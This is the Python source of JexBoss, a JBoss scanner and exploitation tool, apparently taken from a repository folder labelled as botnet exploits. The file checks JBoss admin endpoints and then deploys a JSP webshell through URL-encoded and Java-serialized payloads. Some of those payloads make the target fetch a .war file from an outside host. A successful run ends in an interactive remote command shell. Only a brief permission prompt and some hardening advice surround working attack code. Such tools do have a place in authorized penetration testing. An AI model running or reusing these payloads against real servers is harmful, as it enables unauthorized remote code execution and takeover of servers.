Path: blob/master/Botnets/Exploits/JBOSS FULL/jexboss_vulnscanner.py
# coding: utf-812# JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])34# Updates: https://github.com/joaomatosf/jexboss56# Free for distribution and modification, but the authorship should be preserved.789101112import httplib, sys, urllib, os, time1314from urllib import urlencode15161718RED = '\x1b[91m'1920RED1 = '\033[31m'2122BLUE = '\033[94m'2324GREEN = '\033[32m'2526BOLD = '\033[1m'2728NORMAL = '\033[0m'2930ENDC = '\033[0m'31323334def getHost(url):3536tokens = url.split("://")3738if len(tokens) == 2: #foi fornecido protocolo3940return tokens[1].split(":")[0]4142else:4344return tokens.split(":")[0]45464748def getProtocol(url):4950tokens = url.split("://")5152if tokens[0] == "https":5354return "https"5556else:5758return "http"59606162def getPort(url):6364token = url[6:].split(":")6566if len(token) == 2:6768return token[1]6970elif getProtocol(url) == "https":7172return 4437374else:7576return 8077787980def getConnection(url):8182if getProtocol(url) == "https":8384return httplib.HTTPSConnection(getHost(url), getPort(url))8586else:8788return httplib.HTTPConnection(getHost(url), getPort(url))899091929394def getSuccessfully(url, path):9596result = 4049798time.sleep(5)99100conn = getConnection(url)101102conn.request("GET", path)103104result = conn.getresponse().status105106if result == 404:107108conn.close()109110time.sleep(7)111112conn = getConnection(url)113114conn.request("GET", path)115116result = conn.getresponse().status117118conn.close()119120return result121122123124def checkVul(url):125126127128print ( GREEN +" ** Checking Host: %s **\n" %url )129130131132path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",133134"web-console" : "/web-console/ServerInfo.jsp",135136"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}137138139140for i in path.keys():141142try:143144print GREEN + " * Checking %s: \t" %i + ENDC,145146conn = getConnection(url)147148conn.request("HEAD", path[i])149150path[i] = 
conn.getresponse().status151152if path[i] == 200 or path[i] == 500:153154print RED + "[ VULNERABLE ]" + ENDC155156else: print GREEN + "[ OK ]"157158conn.close()159160except:161162print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC163164path[i] = 505165166167168return path169170171172def autoExploit(url, type):173174175176# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5177178# exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6179180# exploitWebConsoleInvoker: tested and working in jboss 4181182# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5183184185186print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)187188result = 505189190if type == "jmx-console":191192result = exploitJmxConsoleFileRepository(url)193194if result != 200 and result != 500:195196result = exploitJmxConsoleMainDeploy(url)197198elif type == "web-console":199200result = exploitWebConsoleInvoker(url)201202elif type == "JMXInvokerServlet":203204result = exploitJMXInvokerFileRepository(url)205206207208if result == 200 or result == 500:209210print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC211212shell_http(url, type)213214else:215216print (RED + "\n * Could not exploit the flaw automatically. 
Exploitation requires manual analysis...\n"217218" Waiting for 7 seconds...\n "+ ENDC)219220time.sleep(7)221222223224def shell_http(url, type):225226if type == "jmx-console" or type == "web-console":227228path = '/jbossass/jbossass.jsp?'229230elif type == "JMXInvokerServlet":231232path = '/shellinvoker/shellinvoker.jsp?'233234235236conn = getConnection(url)237238conn.request("GET", path)239240conn.close()241242time.sleep(7)243244resp = ""245246#clear()247248print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"249250print RED+" * "+url+": \n"+ENDC251252headers = {"User-Agent" : "jexboss"}253254for cmd in ['uname -a', 'cat /etc/issue', 'id']:255256conn = getConnection(url)257258cmd = urlencode({"ppp": cmd})259260conn.request("GET", path+cmd, '', headers)261262resp += " "+conn.getresponse().read().split(">")[1]263264print resp,265266267268while 1:269270print BLUE + "[Type commands or \"exit\" to finish]"271272cmd=raw_input("Shell> "+ENDC)273274#print ENDC275276if cmd == "exit":277278break279280conn = getConnection(url)281282cmd = urlencode({"ppp": cmd})283284conn.request("GET", path+cmd, '', headers)285286resp = conn.getresponse()287288if resp.status == 404:289290print RED+ " * Error contacting the commando shell. Try again later..."291292conn.close()293294continue295296stdout = ""297298try:299300stdout = resp.read().split("pre>")[1]301302except:303304print RED+ " * Error contacting the commando shell. Try again later..."305306if stdout.count("An exception occurred processing JSP page") == 1:307308print RED + " * Error executing command \"%s\". 
" %cmd.split("=")[1] + ENDC309310else: print stdout,311312conn.close()313314315316def exploitJmxConsoleMainDeploy(url):317318# MainDeployer319320# does not work in jboss5 (bug in jboss5)321322# shell in link323324# /jmx-console/HtmlAdaptor325326jsp = "http://www.joaomatosf.com/rnp/jbossass.war"327328payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"329330"=MainDeployer&methodIndex=19&arg0="+jsp)331332print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "333334"\n available on: "+jsp +ENDC)335336conn = getConnection(url)337338conn.request("HEAD", payload)339340result = conn.getresponse().status341342conn.close()343344return getSuccessfully(url, "/jbossass/jbossass.jsp")345346347348def exploitJmxConsoleFileRepository(url):349350# DeploymentFileRepository351352# tested and work in jboss4, 5.353354# doest not work in jboss6355356# shell jsp357358# /jmx-console/HtmlAdaptor359360jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"361362"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"363364"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"365366"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"367368"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"369370"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"371372"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"373374"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"375376"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"377378"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"379380"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"381382"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"383384"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"385386"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"387388"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%
20%28%20%64"389390"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"391392"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"393394"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )395396397398payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="399400"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="401402"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"403404"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")405406407408conn = getConnection(url)409410conn.request("HEAD", payload)411412result = conn.getresponse().status413414conn.close()415416return getSuccessfully(url, "/jbossass/jbossass.jsp")417418419420def exploitJMXInvokerFileRepository(url):421422# tested and work in jboss4, 5423424# MainDeploy, shell in data425426# /invoker/JMXInvokerServlet427428payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"429430"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"431432"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"433434"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"435436"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"437438"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"439440"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"441442"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"443444"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"445446"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"447448"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"449450"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"451452"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"453454"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"455456"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x
3b\x90"457458"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"459460"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"461462"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"463464"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"465466"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"467468"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"469470"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"471472"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"473474"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"475476"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"477478"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"479480"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"481482"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"483484"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"485486"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"487488"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"489490"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"491492"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"493494"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"495496"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"497498"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"499500"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"501502"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"503504"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"505506"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"507508"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"509510"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"511512"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x
29\x3b\x20\x53\x74\x72"513514"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"515516"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"517518"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"519520"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"521522"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"523524"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"525526"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"527528"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"529530"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"531532"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"533534"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"535536"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"537538"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"539540"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"541542"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"543544"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"545546"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"547548"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"549550"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"551552"\x00\x04\x70\x78")553554conn = getConnection(url)555556headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",557558"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}559560conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)561562response = conn.getresponse()563564result = response.status565566if result == 401:567568print " Retrying..."569570conn.close()571572conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)573574response = conn.getresponse()575576result = response.status577578if 
response.read().count("Failed") > 0:579580result = 505581582conn.close583584return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")585586587588def exploitWebConsoleInvoker(url):589590# does not work in jboss5 (bug in jboss5)591592# MainDeploy, shell in link593594# /web-console/Invoker595596#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"597598#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)599600#jsp = "\\x" + jsp601602payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"603604"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"605606"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"607608"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"609610"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"611612"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"613614"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"615616"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"617618"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"619620"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"621622"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"623624"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"625626"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"627628"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"629630"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"631632"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"633634"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"635636"\x2a"637638#link639640"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"641642"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"643644"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"645646#end647648"\x75\x72\x00\x13\x5b"649650"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"651652"\x67\x3b\xad\xd
2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"653654"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"655656"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"657658"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"659660"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"661662"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"663664"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"665666"\x70\x6c\x6f\x79\x65\x72\x78")667668conn = getConnection(url)669670headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",671672"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}673674conn.request("POST", "/web-console/Invoker", payload, headers)675676response = conn.getresponse()677678result = response.status679680if result == 401:681682print " Retrying..."683684conn.close()685686conn.request("HEAD", "/web-console/Invoker", payload, headers)687688response = conn.getresponse()689690result = response.status691692conn.close693694return getSuccessfully(url, "/jbossass/jbossass.jsp")695696697698699700def clear():701702if os.name == 'posix':703704os.system('clear')705706elif os.name == ('ce', 'nt', 'dos'):707708os.system('cls')709710711712def checkArgs(args):713714if len(args) < 2 or args[1].count('.') < 1:715716return 1,"You must provide the host name or IP address you want to test."717718elif len(args[1].split('://')) == 1:719720return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])721722elif args[1].count('http') == 1 and args[1].count('.') > 1:723724return 0, ""725726else:727728return 1, 'Parâmetro inválido'729730731732def banner():733734clear()735736print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"737738" | |\n"739740" | @author: João Filho Matos Figueiredo |\n"741742" | @contact: [email protected] |\n"743744" | |\n"745746" | @update: 
https://github.com/joaomatosf/jexboss |\n"747748" #______________________________________________________#\n\n" )749750751752banner()753754# check python version755756if sys.version_info[0] == 3:757758print (RED + "\n * Not compatible with version 3 of python.\n"759760" Please run it with version 2.7 or lower.\n\n"761762+BLUE+" * Example:\n"763764" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )765766sys.exit(1)767768769770# check Args771772status, message = checkArgs(sys.argv)773774if status == 0:775776url = sys.argv[1]777778elif status == 1:779780print RED + "\n * Error: %s" %message781782print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC783784sys.exit(status)785786elif status == 2:787788url = ''.join(['http://',sys.argv[1]])789790791792# check vulnerabilities793794mapResult = checkVul(url)795796797798# performs exploitation799800for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:801802if mapResult[i] == 200 or mapResult[i] == 500:803804print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"805806" This operation will provide a simple command shell to execute commands on the server..\n"807808+RED+" Continue only if you have permission!" +ENDC)809810if raw_input(" yes/NO ? ").lower() == "yes":811812autoExploit(url, i)813814815816# resume results817818if mapResult.values().count(200) > 0:819820banner()821822print RED+ " Results: potentially compromised server!" +ENDC823824print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"825826" Recommendations: \n"827828" - Remove web consoles and services that are not used, eg:\n"829830" $ rm web-console.war\n"831832" $ rm http-invoker.sar\n"833834" $ rm jmx-console.war\n"835836" $ rm jmx-invoker-adaptor-server.sar\n"837838" $ rm admin-console.war\n"839840" - Use a reverse proxy (eg. nginx, apache, f5)\n"841842" - Limit access to the server only via reverse proxy (eg. 
DROP INPUT POLICY)\n"843844" - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"845846" References:\n"847848" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"849850" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"851852"\n"853854" - If possible, discard this server!\n\n"855856" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )857858elif mapResult.values().count(505) == 0:859860print ( GREEN+ "\n\n * Results: \n"861862" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)863864865866# infos867868print (ENDC+" * Info: review, suggestions, updates, etc: \n"869870" https://github.com/joaomatosf/jexboss\n"871872" [email protected]\n")873874875876print ENDC877878